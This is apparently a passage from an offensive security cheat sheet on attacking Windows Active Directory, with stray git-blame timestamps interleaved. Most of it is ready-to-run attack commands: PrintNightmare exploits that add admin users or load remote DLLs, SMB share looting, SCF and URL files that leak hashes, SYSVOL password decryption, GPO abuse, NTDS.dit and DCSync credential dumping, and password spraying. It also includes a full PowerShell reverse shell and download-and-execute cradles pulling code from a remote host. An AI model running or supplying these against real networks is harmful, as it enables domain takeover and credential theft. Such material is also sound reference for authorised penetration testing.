* Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0
2021-07-01 12:40:03 +00:00
2021-07-12 12:42:18 +00:00
**Detect the vulnerability**:
* Impacket - [rpcdump ](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py )
```ps1
2021-08-22 21:03:02 +00:00
python3 ./rpcdump.py @10 .0.2.10 | egrep 'MS-RPRN|MS-PAR'
2021-07-12 12:42:18 +00:00
Protocol: [MS-RPRN]: Print System Remote Protocol
```
* [It Was All A Dream ](https://github.com/byt3bl33d3r/ItWasAllADream )
```ps1
git clone https://github.com/byt3bl33d3r/ItWasAllADream
cd ItWasAllADream & & poetry install & & poetry shell
2021-08-22 21:03:02 +00:00
itwasalladream -u user -p Password123 -d domain 10.10.10.10/24
docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10
2021-07-12 12:42:18 +00:00
```
2021-07-04 11:32:32 +00:00
2021-07-12 12:42:18 +00:00
**Trigger the exploit**:
2021-07-04 11:32:32 +00:00
2021-08-22 21:03:02 +00:00
**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109 ](https://github.com/SecureAuthCorp/impacket/pull/1109 ): `python3 ./smbserver.py share /tmp/smb/` or using [Invoke-BuildAnonymousSMBServer ](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1 ) : `Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable`
2021-07-08 08:40:01 +00:00
2021-07-12 12:42:18 +00:00
* [SharpNightmare ](https://github.com/cube0x0/CVE-2021-1675 )
```powershell
# require a modified Impacket: https://github.com/cube0x0/impacket
python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
## LPE
SharpPrintNightmare.exe C:\addCube.dll
## RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
## RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
```
* [Invoke-Nightmare ](https://github.com/calebstewart/CVE-2021-1675 )
```powershell
## LPE only (PS1 + DLL)
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n` /`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*"
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
```
* [Mimikatz v2.2.0-20210709+ ](https://github.com/gentilkiwi/mimikatz/releases )
```powershell
## LPE
misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll
## RCE
misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50
```
2021-09-16 15:45:29 +00:00
* [PrintNightmare - @outflanknl ](https://github.com/outflanknl/PrintNightmare )
```powershell
PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password]
```
2021-07-12 12:42:18 +00:00
**Debug informations**
| Error | Message | Debug |
|--------|---------------------|------------------------------------------|
| 0x5 | rpc_s_access_denied | Permissions on the file in the SMB share |
| 0x525 | ERROR_NO_SUCH_USER | The specified account does not exist. |
| 0x180 | unknown error code | Share is not SMB2 |
2021-07-01 12:40:03 +00:00
2018-12-25 19:35:39 +00:00
### Open Shares
2018-08-12 21:30:22 +00:00
2021-07-01 12:40:03 +00:00
> Some shares can be accessible without authentication, explore them to find some juicy files
2021-04-21 20:27:07 +00:00
* [smbmap ](https://github.com/ShawnDEvans/smbmap )
```powershell
smbmap -H 10.10.10.10 # null session
smbmap -H 10.10.10.10 -R # recursive listing
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
```
2019-05-12 20:23:55 +00:00
2021-04-21 20:27:07 +00:00
* [pth-smbclient from path-toolkit ](https://github.com/byt3bl33d3r/pth-toolkit )
```powershell
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
ls # list files
cd # move inside a folder
get # download files
put # replace a file
```
2019-05-12 20:23:55 +00:00
2021-04-21 20:27:07 +00:00
* [smbclient from Impacket ](https://github.com/SecureAuthCorp/impacket )
```powershell
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
use Sharename # select a Sharename
cd Folder # move inside a folder
ls # list files
```
2018-08-12 21:30:22 +00:00
2021-04-21 20:27:07 +00:00
* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers ](# )
```powershell
smbclient -U username //10.0.0.1/SYSVOL
smbclient //10.0.0.1/Share
# Download a folder recursively
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd '/path/to/go/'
smb: \> mget *
```
2018-07-08 18:03:40 +00:00
2019-11-14 22:54:57 +00:00
### SCF and URL file attack against writeable share
2019-11-14 22:37:51 +00:00
2021-09-01 12:10:53 +00:00
Theses attacks can be automated with [Farmer.exe ](https://github.com/mdsecactivebreach/Farmer ) and [Crop.exe ](https://github.com/mdsecactivebreach/Farmer/tree/main/crop )
```ps1
# Farmer to receive auth
farmer.exe < port > [seconds] [output]
farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
farmer.exe 8888 60 # one minute
# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
crop.exe < output folder > < output filename > < WebDAV server > < LNK value > [options]
Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico
Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec
```
#### SCF Files
2019-11-14 22:54:57 +00:00
Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
2019-11-14 22:37:51 +00:00
```powershell
[Shell]
Command=2
2021-04-21 20:27:07 +00:00
IconFile=\\10.10.10.10\Share\test.ico
2019-11-14 22:37:51 +00:00
[Taskbar]
Command=ToggleDesktop
```
2021-09-01 12:10:53 +00:00
#### URL Files
2019-11-14 22:54:57 +00:00
This attack also works with `.url` files and `responder -I eth0 -v` .
```powershell
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
2021-04-21 20:27:07 +00:00
IconFile=\\10.10.10.10\%USERNAME%.icon
2019-11-14 22:54:57 +00:00
IconIndex=1
```
2021-09-01 12:10:53 +00:00
#### Windows Library Files
> Windows Library Files (.library-ms)
```xml
<?xml version="1.0" encoding="UTF-8"?>
< libraryDescription xmlns = "<http://schemas.microsoft.com/windows/2009/library>" >
< name > @windows.storage.dll,-34582< / name >
< version > 6< / version >
< isLibraryPinned > true< / isLibraryPinned >
< iconReference > imageres.dll,-1003< / iconReference >
< templateInfo >
< folderType > {7d49d726-3c21-4f05-99aa-fdc2c9474656}< / folderType >
< / templateInfo >
< searchConnectorDescriptionList >
< searchConnectorDescription >
< isDefaultSaveLocation > true< / isDefaultSaveLocation >
< isSupported > false< / isSupported >
< simpleLocation >
< url > \\\\workstation@8888\\folder</ url >
< / simpleLocation >
< / searchConnectorDescription >
< / searchConnectorDescriptionList >
< / libraryDescription >
```
#### Windows Search Connectors Files
> Windows Search Connectors (.searchConnector-ms)
```xml
<?xml version="1.0" encoding="UTF-8"?>
< searchConnectorDescription xmlns = "<http://schemas.microsoft.com/windows/2009/searchConnector>" >
< iconReference > imageres.dll,-1002< / iconReference >
< description > Microsoft Outlook< / description >
< isSearchOnlyItem > false< / isSearchOnlyItem >
< includeInStartMenuScope > true< / includeInStartMenuScope >
< iconReference > \\\\workstation@8888\\folder.ico</ iconReference >
< templateInfo >
< folderType > {91475FE5-586B-4EBA-8D75-D17434B8CDF6}< / folderType >
< / templateInfo >
< simpleLocation >
< url > \\\\workstation@8888\\folder</ url >
< / simpleLocation >
< / searchConnectorDescription >
```
2019-11-14 22:54:57 +00:00
2019-12-26 11:09:23 +00:00
### Passwords in SYSVOL & Group Policy Preferences
2018-08-12 21:30:22 +00:00
2019-12-26 11:09:23 +00:00
Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\` .
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```powershell
findstr /S /I cpassword \\< FQDN > \sysvol\<FQDN>\policies\*.xml
```
2019-02-07 22:33:47 +00:00
Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0 ](https://twitter.com/0x00C651E0/status/956362334682849280 )), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption ](https://msdn.microsoft.com/en-us/library/cc422924.aspx )
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
```bash
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
2018-12-24 14:02:50 +00:00
e.g:
echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
2018-05-27 20:27:31 +00:00
```
2019-12-26 11:09:23 +00:00
#### Automate the SYSVOL and passwords research
2018-08-12 21:30:22 +00:00
2021-04-21 20:27:07 +00:00
* `Metasploit` modules to enumerate shares and credentials
2019-12-26 11:09:23 +00:00
```c
scanner/smb/smb_enumshares
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp
```
2018-08-12 21:30:22 +00:00
2021-04-21 20:27:07 +00:00
* CrackMapExec modules
2019-12-26 11:09:23 +00:00
```powershell
2021-04-21 20:27:07 +00:00
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
2019-12-26 11:09:23 +00:00
```
2018-07-15 09:06:43 +00:00
2021-04-21 20:27:07 +00:00
* [Get-GPPPassword ](https://github.com/ShutdownRepo/Get-GPPPassword )
```powershell
# with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
2018-08-12 21:30:22 +00:00
2021-04-21 20:27:07 +00:00
# with cleartext credentials
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
2018-05-05 15:32:19 +00:00
2021-04-21 20:27:07 +00:00
# pass-the-hash
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
```
2018-05-05 15:32:19 +00:00
2019-12-26 11:09:23 +00:00
#### Mitigations
* Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
* Delete existing GPP xml files in SYSVOL containing passwords.
* Don’ t put passwords in files that are accessible by all authenticated users.
2020-01-05 15:28:00 +00:00
### Exploit Group Policy Objects GPO
2020-05-10 21:16:29 +00:00
> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
2021-04-21 20:27:07 +00:00
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
2021-01-29 21:10:22 +00:00
GPO are stored in the DC in `\\<domain.dns>\SYSVOL\<domain.dns>\Policies\<GPOName>\` , inside two folders **User** and **Machine** .
If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks` .
:warning: Domain members refresh group policy settings every 90 minutes by default but it can locally be forced with the following command: `gpupdate /force` .
#### Find vulnerable GPO
Look a GPLink where you have the **Write** right.
```powershell
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")}
```
#### Abuse GPO with SharpGPOAbuse
2020-09-18 19:21:55 +00:00
2020-01-05 15:28:00 +00:00
```powershell
2020-05-10 14:17:10 +00:00
# Build and configure SharpGPOAbuse
2021-01-29 21:10:22 +00:00
$ git clone https://github.com/FSecureLABS/SharpGPOAbuse
$ Install-Package CommandLineParser -Version 1.9.3.15
$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll
2020-05-10 14:17:10 +00:00
2020-01-05 15:28:00 +00:00
# Adding User Rights
2021-01-29 21:10:22 +00:00
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
2020-01-05 15:28:00 +00:00
# Adding a Local Admin
2021-01-29 21:10:22 +00:00
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
2020-01-05 15:28:00 +00:00
# Configuring a User or Computer Logon Script
2021-01-29 21:10:22 +00:00
.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
2020-01-05 15:28:00 +00:00
# Configuring a Computer or User Immediate Task
2021-02-21 19:17:57 +00:00
# /!\ Intended to "run once" per GPO refresh, not run once per system
2021-01-29 21:10:22 +00:00
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\User' --TaskName "EvilTask" --Arguments "/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND " --Command "cmd.exe" --Force
2020-01-05 15:28:00 +00:00
```
2021-01-29 21:10:22 +00:00
#### Abuse GPO with PowerGPOAbuse
* https://github.com/rootSySdk/PowerGPOAbuse
```ps1
PS> . .\PowerGPOAbuse.ps1
# Adding a localadmin
PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
# Assign a new right
PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
# Adding a New Computer/User script
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
# Create an immediate task
PS> Add-UserTask/Add-ComputerTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator
```
#### Abuse GPO with pyGPOAbuse
2020-05-24 12:09:46 +00:00
```powershell
2021-01-29 21:10:22 +00:00
$ git clone https://github.com/Hackndo/pyGPOAbuse
2020-05-24 12:09:46 +00:00
# Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
# Reverse shell example
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>& 1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user
```
2021-01-29 21:10:22 +00:00
#### Abuse GPO with PowerView
2020-05-10 21:16:29 +00:00
```powershell
# Enumerate GPO
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO
New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force
```
2021-06-28 20:08:06 +00:00
#### Abuse GPO with StandIn
```powershell
# Add a local administrator
StandIn.exe --gpo --filter Shards --localadmin user002
# Set custom right to a user
StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege"
# Execute a custom command
StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args"
```
2020-01-05 15:28:00 +00:00
2019-11-25 22:35:20 +00:00
### Dumping AD Domain Credentials
You will need the following files to extract the ntds :
2020-11-06 15:20:03 +00:00
- NTDS.dit file
2019-11-25 22:35:20 +00:00
- SYSTEM hive (C:\Windows\System32\SYSTEM)
2018-08-12 21:30:22 +00:00
2020-11-06 15:20:03 +00:00
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit` .
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
However you can change the location to a custom one, you will need to query the registry to get the current location.
```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
```
2018-08-12 21:30:22 +00:00
#### Using ndtsutil
2018-05-20 20:10:33 +00:00
```powershell
2018-05-05 15:32:19 +00:00
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
2018-05-20 20:10:33 +00:00
```
2018-05-05 15:32:19 +00:00
2019-01-28 19:27:45 +00:00
or
```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```
2018-08-12 21:30:22 +00:00
#### Using Vshadow
2018-05-20 20:10:33 +00:00
```powershell
2018-05-05 15:32:19 +00:00
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
```
2018-05-20 20:10:33 +00:00
2018-07-08 18:03:40 +00:00
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang ](https://github.com/samratashok/nishang )
2018-08-12 21:30:22 +00:00
2018-07-08 18:03:40 +00:00
```powershell
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
```
2018-08-12 21:30:22 +00:00
#### Using vssadmin
2018-07-08 18:03:40 +00:00
```powershell
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
```
2018-08-12 21:30:22 +00:00
#### Using DiskShadow (a Windows signed binary)
2018-07-08 18:03:40 +00:00
2018-05-20 20:10:33 +00:00
```powershell
diskshadow.txt contains :
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
then:
2018-07-08 18:03:40 +00:00
NOTE - must be executed from C:\Windows\System32
2018-05-20 20:10:33 +00:00
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
```
2019-11-07 22:21:00 +00:00
#### Using esentutl.exe
Copy/extract a locked file such as the AD Database
```powershell
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
```
2018-08-12 21:30:22 +00:00
#### Extract hashes from ntds.dit
2019-11-25 22:35:20 +00:00
then you need to use secretsdump to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit
2018-08-12 21:30:22 +00:00
```java
2018-07-08 18:03:40 +00:00
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
2018-05-05 15:32:19 +00:00
```
2018-08-12 21:30:22 +00:00
2018-07-07 10:04:55 +00:00
secretsdump also works remotely
2018-08-12 21:30:22 +00:00
```java
2020-02-06 20:41:29 +00:00
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status
2018-07-08 18:03:40 +00:00
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10 .0.0.1
2018-07-07 10:04:55 +00:00
```
2018-05-05 15:32:19 +00:00
2020-02-06 20:41:29 +00:00
* `-pwd-last-set` : Shows pwdLastSet attribute for each NTDS.DIT account.
* `-user-status` : Display whether or not the user is disabled.
2018-08-12 21:30:22 +00:00
#### Alternatives - modules
2018-05-05 15:32:19 +00:00
2018-05-20 20:10:33 +00:00
Metasploit modules
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```c
windows/gather/credentials/domain_hashdump
```
PowerSploit module
2018-08-12 21:30:22 +00:00
```powershell
2018-05-05 15:32:19 +00:00
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
```
2018-07-07 10:04:55 +00:00
CrackMapExec module
2018-08-12 21:30:22 +00:00
```powershell
2018-07-07 10:04:55 +00:00
cme smb 10.10.0.202 -u username -p password --ntds vss
2019-08-18 10:08:51 +00:00
cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
2018-07-07 10:04:55 +00:00
```
2019-10-17 22:07:09 +00:00
#### Using Mimikatz DCSync
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
```powershell
2020-11-06 15:20:03 +00:00
# DCSync only one user
2019-10-17 22:07:09 +00:00
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
2020-11-06 15:20:03 +00:00
# DCSync all users of the domain
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
2019-10-17 22:07:09 +00:00
```
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
2019-10-20 11:25:06 +00:00
#### Using Mimikatz sekurlsa
Dumps credential data in an Active Directory domain when run on a Domain Controller.
:warning: Requires administrator access with debug or Local SYSTEM rights
```powershell
sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt
```
2019-10-17 22:07:09 +00:00
2020-11-06 15:20:03 +00:00
#### Crack NTLM hashes with hashcat
Useful when you want to have the clear text password or when you need to make stats about weak passwords.
Recommended wordlists:
- rockyou (available in Kali Linux)
- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290& type=hfound)
- Collection #1 (passwords from Data Breaches, might be illegal to possess)
```powershell
# Basic wordlist
# (-O) will Optimize for 32 characters or less passwords
# (-w 4) will set the workload to "Insane"
$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2
# Generate a custom mask based on a wordlist
$ git clone https://github.com/iphelix/pack/blob/master/README
$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask
$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask
```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
- [hashes.org ](https://hashes.org/check.php )
- [hashes.com ](https://hashes.com/en/decrypt/hash )
2019-11-14 22:37:51 +00:00
### Password spraying
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
2019-11-25 22:35:20 +00:00
Most of the time the best passwords to spray are :
2021-08-10 21:00:19 +00:00
- P@ssw0rd01, Password123, Password1, Hello123, mimikatz
2020-01-05 21:11:28 +00:00
- Welcome1/Welcome01
2019-11-25 22:35:20 +00:00
- $Companyname1 : $Microsoft1
2021-08-10 21:00:19 +00:00
- SeasonYear : Winter2019*, Spring2020!, Summer2018?, Summer2020, July2020!
2019-11-25 22:35:20 +00:00
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
2021-08-10 21:00:19 +00:00
2019-11-25 22:35:20 +00:00
#### Kerberos pre-auth bruteforcing
Using `kerbrute` , a tool to perform Kerberos pre-auth bruteforcing.
2019-11-14 22:37:51 +00:00
2021-04-21 20:27:07 +00:00
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
2019-11-14 22:37:51 +00:00
2021-08-10 21:00:19 +00:00
* Username bruteforce
```powershell
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
```
* Password bruteforce
```powershell
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
```
* Password spray
```powershell
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
```
2019-11-14 22:37:51 +00:00
2019-11-25 22:35:20 +00:00
#### Spray a pre-generated passwords list
2021-08-10 21:00:19 +00:00
* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```
* Using `DomainPasswordSpray` to spray a password against all users of a domain.
```powershell
# https://github.com/dafthack/DomainPasswordSpray
Invoke-DomainPasswordSpray -Password Summer2021!
# /!\ be careful with the account lockout !
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
```
* Using `SMBAutoBrute` .
```powershell
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
```
2021-03-24 11:44:35 +00:00
2019-11-25 22:35:20 +00:00
#### Spray passwords against the RDP service
2021-08-10 21:00:19 +00:00
* Using RDPassSpray to target RDP services.
```powershell
git clone https://github.com/xFreed0m/RDPassSpray
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
```
* Using hydra and ncrack to target RDP services.
```powershell
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
ncrack – connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
2019-11-14 22:37:51 +00:00
2021-06-28 20:08:06 +00:00
#### BadPwdCount attribute
> The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.
```powershell
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: < never >
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: < never >
```
2018-07-08 18:03:40 +00:00
### Password in AD User comment
2018-08-12 21:30:22 +00:00
2021-06-28 20:08:06 +00:00
```powershell
$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users
GET-DESC... 10.0.2.11 389 dc01 [+] Found following users:
GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account
```
There are 3-4 fields that seem to be common in most AD schemas: UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
2018-05-27 20:27:31 +00:00
```powershell
enum4linux | grep -i desc
2019-05-12 19:34:09 +00:00
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
2018-05-27 20:27:31 +00:00
```
